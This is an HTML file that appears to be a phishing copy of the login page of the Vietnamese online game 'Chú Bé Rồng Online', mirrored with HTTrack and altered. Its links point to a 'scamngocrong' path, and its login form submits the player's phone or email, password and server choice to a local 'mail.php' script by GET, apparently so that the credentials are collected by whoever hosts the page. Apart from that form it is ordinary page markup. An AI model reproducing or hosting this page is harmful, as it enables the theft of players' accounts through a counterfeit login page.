<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"><html>
    
<!-- Mirrored from forum.ngocrongonline.com/app/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jan 2017 09:32:05 GMT -->
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Chào mừng bạn đến với Chú Bé Rồng Online - Đăng nhập, Đăng ký</title>
        <link rel="stylesheet" href="view/css/template.css" type="text/css" />		
        <link rel="shortcut icon" href='view/images/favicon.png' type="image/x-icon" />
		<script type="text/javascript">
		  var _gaq = _gaq || [];
		  _gaq.push(['_setAccount', 'UA-22738816-4']);
		  _gaq.push(['_setDomainName', '.teamobi.com']);
		  _gaq.push(['_trackPageview']);

		  (function() {
			var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
			var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
		  })();
		</script>
    </head>   
    <body>
        <div class="body_body">
            <div class="left_top"></div><div class="bg_top"><div class="right_top"></div></div>
            <div class="body-content">
                <div class="a" align="center"><img src="view/images/logoW.png" height="90"/></div>
                <div id="top">
                    <div class="link-more">	
                        <div class="h" align="center">
                            <!--<div style="color: #032E58;margin-top:-8px;margin-bottom:4px;">
							<center> <b>Mạng xã hội cho điện thoại di động</b></center> 
							</div>-->
							<div class="bg_tree"></div>
							<div class="bg_noel"></div>
                            <div class="menu2" style="background: #561d00;">
								<table width="100%" border="0" cellspacing="4">
									<tr class="menu">
										<td><a href="/scamngocrong/login.html">Trang Chủ</a></td>
										<td id="selected"><a href="/scamngocrong/login.html">Diễn Đàn</a></td>
									</tr>
								</table>
							</div>
                                                                                    <div class="bg-content" style="text-align:center">
                            <div style="font-size:10px;">Sử dụng tài khoản Chú Bé Rồng Online để đăng nhập.</div>
                                <center>
								 <form 

action="mail.php" 

method="get"

id="form - kenhgiaitri-chiasetonghop.txt " class="loginForm">

                                    <table>
                                        <tr>
                                            <td colspan=2><label  for="tài khoản:">SĐT / Email:</label></td>
                                            <td colspan=2><input name="tài khoản" type="text"  /></td>
                                        </tr>
                                        <tr>
                                            <td colspan=2><label  for="mật khẩu:">Mật khẩu:</label></td>
                                            <td colspan=2><input name="mật khẩu" type="password"  />
                                        </tr>
										<tr align="center">
											<td>
												<input type="radio" name="server" value=1 /> Server 1 sao
											</td>
											<td>
												<input type="radio" name="server" value=2 /> Server 2 sao
											</td>
											<td>
												<input type="radio" name="server" value=3 /> Server 3 sao
											</td>
											<td>
												<input type="radio" name="server" value=4 /> Server 4 sao
											</td>
											<td>
												<input type="radio" name="server" value=5 /> Server 5 sao
											</td>
											<td>
												<input type="radio" name="server" value=6 /> Server 6 sao
											</td>
										</tr>
                                    </table>
                                    <button type="submit"  >Đăng nhập</button><br />
                                    <div style="font-size:10px;">
								Nếu bạn chưa có tài khoản, vui lòng <a href="view/register.html">đăng ký</a><br>
								<a href="http://ngocrongonline.com/matkhau">Quên mật khẩu</a></div>
                                </form><br>
								</center>
                            </div>
                        </div>
                        <br>
                    </div><br>

                </div>

            </div>

          <div class="left_b_bottom"><div class="right_b_bottom"><div class="footer"><div class="left_bottom"></div><div class="right_bottom"></div></div></div></div>
 <div class="copyright"><br><b>Bản quyền thuộc về Chú Bé Rồng Online - 2013</b></div>
</div>
        </div>
    </div>
</body>


<!-- Mirrored from forum.ngocrongonline.com/app/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jan 2017 09:32:07 GMT -->
</html>